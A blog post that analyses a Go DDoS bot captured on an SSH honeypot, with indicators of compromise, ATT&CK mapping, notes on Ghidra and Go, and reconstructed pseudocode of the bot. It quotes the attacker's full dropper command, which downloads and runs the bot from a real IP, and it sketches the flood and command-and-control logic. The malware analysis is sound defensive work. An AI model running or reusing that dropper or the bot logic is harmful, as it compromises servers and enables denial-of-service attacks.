Ivy Fan-Chiang - Learning Go Binary Reverse Engineering through Malware Analysis
  • Home
  • About
  • Projects
  • Blog
  • Misc
  • Contact
  • Learning Go Binary Reverse Engineering through Malware Analysis


    Posted 2024/11/06

    My last malware related project that I covered on this blog was the setup of my honeypot server and some analytics on the traffic it was receiving. I set up that honeypot server with the intention of collecting malware samples to reverse engineer, and this bot was one sample that piqued my interest. Here is my journey into the world of reverse engineering Go binaries and learning how Go works at the low-level1

    Threat Intelligence

    Just before we talk about analyzing the binary and Go being weird, here is some basic threat intelligence information.

    Indicators of Compromise

    1
    2
    3
    4
    5
    http://45[.]89[.]28[.]202/bot
    45[.]89[.]28[.]202
    sha256: 20709ae46fc978fcc3498c58852328f4114997b0259f8a2474fa050c0f609fab
    sha1: ba5b0d3f1aa7ca6be55b9ec100c883adf41d9575
    md5: 2be4f5e573b25d434def7a1b2d8e6648
    

    File Information

    File Type: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=HjkOUQdTP3LWmpfPkHeS/c71tNEcp__rNDf2Dahrq/azEhjfHtK4nvNTv5WH_D/B5Ck3lybWWsL94Sp9e2X, stripped

    File Size: 2.21 MB (2321304 bytes)

    DiE Engine Output: ELF: Go(1.10.x-1.17.x)[EXEC AMD64-64]

    GoAnalyzer Output: go1.13.8

    MITRE ATT&CK

    • Discovery
      • T1046: Network Service Discovery
    • Credential Access
      • T1110: Brute Force
        • T1110.001: Password Guessing
        • T1110.003: Password Spraying
    • Initial Access
      • T1078: Valid Accounts
        • T1078.001: Valid Accounts: Default Accounts
      • T1133: External Remote Services
    • Execution
      • T1059: Command and Scripting Interpreter
        • T1059.004: Command and Scripting Interpreter: Unix Shell
    • Defence Evasion
      • T1027: Obfuscated Files or Information
        • T1027.008: Obfuscated Files or Information: Stripped Payloads
    • Command and Control
      • T1095: Non-Application Layer Protocol
      • T1571: Non-Standard Port
    • Impact
      • T1499: Endpoint Denial of Service
        • T1499.001: Endpoint Denial of Service: OS Exhaustion Flood
      • T1498: Network Denial of Service
        • T1498.001: Network Denial of Service: Direct Network Flood

    Initial Attack

    The initial attack on my honeypot for this particular sample occurred on August 7th, 2024. It appears that an automated scanner at 194.50.16.221 (Alsycon B.V. VPS) spotted my “unsecured SSH server” and attempted to run a series of shell commands on the system. The scanner tried this a few times throughout that week, and most attacks looked like the following

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    lscpu | grep "CPU(s):                " &&
    echo -e "JnrmpaEYdWWTJnrmpaEYdWWT" | passwd &&
    pkill bin.x86_64;
    cd /tmp;
    wget http://45.89.28.202/bot;
    curl -s -O http://45.89.28.202/bot;
    chmod 777 bot;
    ./bot;
    iptables -A INPUT -s 194.50.16.26 -j DROP;
    iptables -A INPUT -s 85.239.34.237 -j DROP
    

    Some analysis on this command; it first extracts CPU information from the system and attempts to change the user password. It then attempts to kill other malware running on the system named bin.x86_64, this is a pretty common name for malware binaries that I have seen on my honeypot. Afterwards, it tries to download the malware using both wget and curl into the /tmp directory, gives the file the appropriate permissions, and executes it. The final thing which piqued my interest is that the scanner went and blocked the IP addresses of competing malware’s command & control (C2) infrastructure using iptables. This was really interesting because port scanning these IP addresses helped me find new web servers and FTP servers filled with more samples to analyze in the future.

    Like the malware sample, the scanner appears to be written in Go as it connected with the SSH client version string SSH-2.0-Go.

    Recovering Symbols and Other Ghidra Setup

    The binary that was acquired is an ELF file that is stripped of debugging symbols. This means we shouldn’t have access to function names and variable names as written by the malware author. However, the Go compiler is very silly and doesn’t strip function names from binaries completely, as they are included in the .gopclntab section of the binary and used by the Go runtime. This section of the binary is a function table that contains the function address and function metadata like the function name. Luckily, other people have made extensions and scripts for recovering these function names! Personally, I use GolangAnalyzerExtension2 for Ghidra for the task of recovering these function names, string literals, and interface/struct type definitions.

    image-20241104103420770

    Another quirk is that Ghidra doesn’t understand Golang strings normally because the string type in Go is defined like this:

    1
    2
    3
    4
    struct string {
      char* ptr;
      int len;
    };
    

    The string char* pointer is pointed to a part of the .rodata part of the binary. This .rodata section contains a binary blob of all string literals used by the program and runtime, appended together into one massive string, and strings used by the program are statically or dynamically initialized into the string struct with data from this blob by the compiler or runtime. This also requires some scripting to help Ghidra understand, but the GolangAnalyzerExtension does this for us 🎉.

    Type definitions for structs are also bundled into the binary for >= Go 1.5 and can be extracted with GolangAnalyzerExtension or GoReSym.

    Random Quirks about Go

    Most decompilers are designed to decompile binaries to a pseudo-C language, so using them on binaries written in languages like Go usually results in decompiler output that is very messy. Different tasks the Go runtime does like garbage collection and exception handling get mixed into the decompiler code, and reading the code involves picking out which instructions belong to the runtime, and which instructions belong to the actual program you are reverse engineering. Go also does a lot of other things differently than C/C++ like calling conventions and data types.

    First, let’s look at the Go compiler’s calling conventions. Calling conventions are how different functions within a program are called, and what the conventions on passing arguments and return values between functions are. Most compilers targeting x86_64 systems push arguments into registers and receive return values through registers. Golang, on the other hand, pushes all arguments onto the stack and returns values using the stack. Most C/C++ compilers also have callee-saved registers that are used for temporary values throughout the execution of a function, whereas Golang spills temporaries onto the stack. For more information about the calling convention on an assembly level, Dr. Raphael Poss has a very thorough article on his blog.

    How does this impact us though when doing reverse engineering? Ghidra expects argument variables to passed through registers and doesn’t really understand Go’s calling convention, especially with optimized binaries. Enabling Decompiler Parameter ID analysis helps somewhat in identifying the number of arguments and return values, but many temporary values and variables will have to be manually analyzed by tracking the use of different stack memory addresses.

    image-20241103232219619

    Now onto Go data types. As mentioned earlier, Go doesn’t use regular C-style strings like C/C++. Each string is a struct of a char*-like data pointer and an int value holding the string’s length. This is also true of many array/slice types in Go. Slice types are made up of a data pointer to the values in memory, an int value holding the array size and an int capacity value if the size is mutable3. This means that when a function has a string or slice argument, you’ll usually see two or three arguments for each string/slice passed in Ghidra’s decompiler output. Any interface types are also consist of two pointers, with a pointer to a vtable and another to the interface data.

    For example, here’s a what a call to net.Dial(network, address string) (Conn, error)4 from the malware’s code looks like in Ghidra:

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    net.Dial(
        "tcp",  // network string
        (int)0x3,  // length of "tcp"
        in_stack_ffffffffffffff88,  // pointer to address string
        (int)in_stack_ffffffffffffffa8,   // length of address
        pcVar9,  // Conn data
        in_stack_ffffffffffffff88,  // Conn vtable
        in_stack_ffffffffffffffa8,  // error data
        in_stack_ffffffffffffffb0  // error vtable
    );
    

    With these quirks in mind and remembering that the decompiler output also includes instructions from the Go runtime, reverse engineering Go binaries isn’t too painful with the right tooling, having the Go documentation and standard library source code handy, and a bit of pattern recognition… Most of the work becomes developing an intuition for which instructions belong to the runtime and then ignoring them, translating the rest of the instructions from decompiler output to Go source code. There’s also fun quirks in Go’s concurrent Goroutines, WaitGroups5, and defer statements, but surely that won’t become a problem for us later6

    Back to the malware

    We figured out how Go works! Now back to the silly little malware that someone tried attacking me with. GolangAnalyzer and GoReSym managed to find this list of functions (note that the functions ending with .func1 are overloaded versions):

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    main.SendRawTCP
    main.SimulateMinecraftPacket
    main.sendMinecraftPackets
    main.sendLargePackets
    main.sendUDPFlood
    main.sendIPIPAttack
    main.sendTCPJunk
    main.getOutboundIP
    main.handleAttack
    main.handleUDPFlood
    main.handleUDPFlood.func1
    main.handleIPIPAttack
    main.handleIPIPAttack.func1
    main.handleTCPJunkAttack
    main.listenForCommands
    main.main
    main.ensureSingleInstance
    main.ensureSingleInstance.func1
    

    Let’s start by reversing main.main like any sane person doing reverse engineering would do. This function is pretty simple if you ignore all the random instructions the Go runtime is doing, it runs main.ensureSingleInstance, sets up a couple variables, and calls the main.listenForCommands function (note that any Go code in this section is my best-effort guess at translating Ghidra’s gibberish back to Golang and probably won’t compile):

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    func main() {
        for true {
            ensureSingleInstance()
            ppid := syscall.RawSysCall(syscall.SYS_GETPPID)
            if ppid != 1 {
                goto label1
            }
    
            if len(os.Args) != 0 {
                cmd := os/exec.Command(os.Args[0], os.Args[1])
                cmd.Start()
                fmt.Fprintln("InfectedNight_did_its_job!")
                if (len(os.Args) != 0) {
                    os.remove(os.Args[0])  // self delete
                    os.Exit()
                }
            label1:
                t := time.Now()
                rand.seed(t)  // does some seeding based on time
                int1 := rand.Intn(10)
                int2 := rand.Intn(100)
                s := fmt.Sprintf("[kworker/u%d:%d]", t)
                listenForCommands("45.389.28.202", 0x13f7) // connecting to 45.389.28.202:5111
            }
        }
    }
    

    The function has a reference to the InfectedNight Mirai variant, but from what I could find, there is no resemblance between this sample and the InfectedNight sample that IBM X-Force made a report on other than the string “InfectedNight_did_its_job!”.

    main.ensureSingleInstance() is pretty simple, the function opens a TCP listener on a hard-coded port, and if the listener fails to open because a process is already listening on that port, it exits the program.

    main.listenForCommands() is where the code gets interesting. This function contacts the C2 server over TCP, performs a custom handshake, and then continuously listens for binary encoded commands. My understanding of the handshake and custom TCP protocol is flaky as by the time I stopped procrastinating this project, the C2 server had been taken down 😭 and I couldn’t try dynamically analysis on the C2 server. This function clearly describes to us that commands include a command number, a victim IP, and attack duration, and that there are 4 different attack types and a command to kill the malware in a switch statement7:

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    func listenForCommands(c2_addr string, port int) {
        for true {
            for true {
                for true {  // why so many for true statements???
                    addr := fmt.Sprintf("%s:%d", c2_addr, port)
                    conn, err := net.Dial("tcp", addr)  // connect to c2
                    if err == nil {
                        break
                    }
                    time.Sleep(5000000000) // 5 seconds (idk why sleep arguments are nanoseconds)
                }
                var arr [5]byte  // handshake stuff
                arr = 0x0100000042;
                n, err := conn.Write(arr);
                if err == nil {
                    break
                }
                n, err := conn.Read();
            }
            var arr [1]byte
            arr[0] = 5
            n, err := conn.Write([]byte("\x01"))
            if err == nil {
                break
            }
            n, err := conn.Read();
        }
        n, err := conn.Write([]byte("CNC01"))
        if err == nil {
            for true {
                input := make([]byte, 0x20)
                n, err := conn.Read(input)
                if err != nil {
                    break
                }
                if n < 0xd && input == "\x00\x0e\x00\x00\x00" {
                    duration = input[5]  // the command
                    attack_type = input[6]
                    victim := net.IP.String(input[8:12])
    
                    switch attack_type {
                    case 0:
                        go handleAttack(victim, duration)
                    case 1:
                        go handleUDPFlood(victim, duration)
                    case 2:
                        go handleIPIPAttack(victim, duration) 
                    case 3:
                        go handleTCPJunkAttack(victim, duration)  
                    case 99:
                        os.Exit(0)
                    }
                }
            }
        }
    }
    

    If you know anything about Go, you’ll notice that this is our first function with concurrency! The code above has silly syntax where it says go f() which is calling that function as a Goroutine.

    Super fast intro to Goroutines and WaitGroups: A Goroutine is how you can split a function off into its own little thread so that you can do tasks concurrently. However, if you split a task off and want to wait for it to finish, you need some way of knowing when that thread is complete. This is what WaitGroups do, they are basically just a counter that lets you count how many Goroutine threads are active. By passing the WaitGroup to the Goroutine as an argument, it can decrement the counter when it is finished execution.

    Why did I mention that these would become a problem earlier? Because Ghidra struggles to produce comprehensible decompiler output when Goroutines are called! The line go handleAttack(victim, duration) ends up looking like this in Ghidra:

    image-20241104014553600

    The runtime.newproc function is how Goroutines are actually implemented, but this output has no information about the Goroutine’s arguments! Finding the arguments for the Goroutine basically involves reverse engineering the routine’s function signature, staring at the assembly to see what is at the top of the stack at the given moment, and making educated guesses about what the function expects. I said reverse engineering Go wasn’t toooooooooo painful, right? Surely this won’t be the only weird Golang construct that will give us problems…

    Anyways, I love the super descriptive function names we are getting, it’s funny that our attacker tried to hide these names from us by stripping the binary and the Go compiler included them anyway. Let’s continue down the rabbit hole of questionable design decisions in these attacks.

    handleAttack()

    I started looking at this function thinking it would be a pretty standard TCP packet spam attack… but wait, what’s sendMinecraftPackets()? Also, we have our first use of WaitGroups here!

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    func handleAttack(victim string, duration byte) {
        outbound_ip := getOutboundIP()
        var wg sync.WaitGroup
        wg.Add(1)
        go sendMinecraftPackets(victim, outbound_ip, duration, &wg)
        wg.Wait()
        for i := range THREADS {
            wg.Add(1)
            go sendLargePackets(victim, outbound_ip, duration, &wg)
        }
        wg.Wait()
    }
    

    Turns out our malware author decided the most effective way of doing a TCP packet spam attack was to simultaneously send large TCP packets and simulated Minecraft packets, for some reason. Those two functions look something like this:

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    func sendMinecraftPackets(victim string, outbound string, duration byte, wg *sync.WaitGroup) {
        defer wg.Done()
        start := time.Now()
        end := start.Add(time.Duration(duration))
        for true {
            if !time.Now().Before(end) {
                break
            }
            packet := SimulateMinecraftPacket()  // creates a simulated minecraft packet
            SendRawTCP(victim, outbound, wg, packet)
            n := math/rand.Intn(500)
            time.Sleep((n + 500) * 1000000)  // (n+500) * 0.001 seconds
        }
    }
    
    func sendLargePackets(victim string, outbound string, duration byte, wg *sync.WaitGroup) {
        defer wg.Done()
        start := time.Now()
        end := start.Add(time.Duration(duration))
        for true {
            if !time.Now().Before(end) {
                break
            }
            packet := bytes.Repeat(0x41, 0x400)  // 'A' * 0x400
            SendRawTCP(victim, outbound, wg, packet)
            n := math/rand.Intn(500)
            time.Sleep((n + 500) * 1000000)
        }
    }
    

    You might notice we have another weird Golang construct here, the defer statement! A defer statement is used to make a function call happen at the end of the function, and is usually used for function cleanup. These also look very weird in our decompiler output and are something you have to look out for. The defer statement itself looks like this: image-20241104020014001 and the return statement for any function with a defer statement ends up looking like this: image-20241104020306703

    Looking out for these lines in your decompiler output lets you know what function is being deferred and when it eventually gets called. In this case, the function defers calling the Done() method of our handleAttack() function’s WaitGroup, letting the parent function know that the routine is finished by decrementing the WaitGroup counter when it is done running. defer statements are also used throughout the program to close network sockets when a function completes execution.

    SendRawTCP and SimulateMinecraftPacket are pretty simple functions that send TCP data using sockets and generate Minecraft packet data respectively.

    handleUDPFlood(), handleIPIPAttack(), and handleTCPJunkAttack()

    With all the quirks of Golang finally out of the way for the rest of this binary, figuring out what each function and attack does isn’t too hard. None of the other attacks have as questionable or interesting code as handleAttack() :pensive:.

    All the attack functions are broken down into one top level handle[attack_name]() function that handles WaitGroups and calls Goroutines to make attacks run with multiple threads, a handle[attack_name].func1() overloaded function that handles decrementing the WaitGroup, and lastly a send[attack_name]() function that has the implementation of the actual attack.

    handleUDPFlood() is a simple UDP data spam attack that just spams random data at the target.

    handleIPIPAttack() is an implementation of an IP fragmentation attack. Uses a custom IPv4Header struct that GolangAnalyzer defined for us.

    handleTCPJunkAttack() appears to be a SYN flood attack. Uses a custom TCPHeader struct.

    And just like that, we’ve figured out everything that the malware bot does! It is a simple DDoS bot that communicates with a C2 server over raw TCP and implements 4 different types of DDoS attacks using Goroutines for concurrency.

    Overall thoughts

    I tried searching around grep.app and GitHub to see if the code for this malware got leaked on GitHub, or it was reused code. The function name SimulateMinecraftPacket seemed unique enough that if it existed, I would find a match. Nothing showed up, which seems to suggest the malware author wrote this code from scratch.

    The lack of any cryptography, hard-coded information like C2 IPs, and the lack of any detection evasion other than self-deletion seems to suggest that the malware author is not very competent. I wish that the C2 server that his malware used still was up so that I could try dynamically testing this sample and dissect its network protocol completely. Alas, that is not the case, so I got as much information as I could statically.

    However, it was a fun exercise in learning how Go binaries work and discovering all the weird quirks of the language! Might take a break from malware research for now and look at doing some vulnerability research projects. Thanks for reading!


    1. Also was learning Go as a programming language at the same time, never really worked with it before. This is the worst possible way to learn Go, if you are actually interested in the language, decompiling the language is a pretty painful way to do it. 

    2. An amazing Ghidra extension that I am now the Nixpkgs package maintainer for! 

    3. strings in Go are not mutable and as such don’t have a capacity value 

    4. func Dial(network, address string) (Conn, error) for those unfamiliar with Go syntax means two arguments named network and address of type string, and two return values that are of type net.Conn and error 

    5. Definitely did not need to call a friend who works for Google to get him to explain WaitGroups properly to me… /s 

    6. ”…reverse-engineering Go binaries is about as fun as pulling teeth from an adorable blue gopher.” - Emily Trau (2022) 

    7. The switch statement was basically a really weird double-nested if-else statement for some reason… “Wait till you learn that switch statements is actually syntactic sugar for if-else” - my friend at Google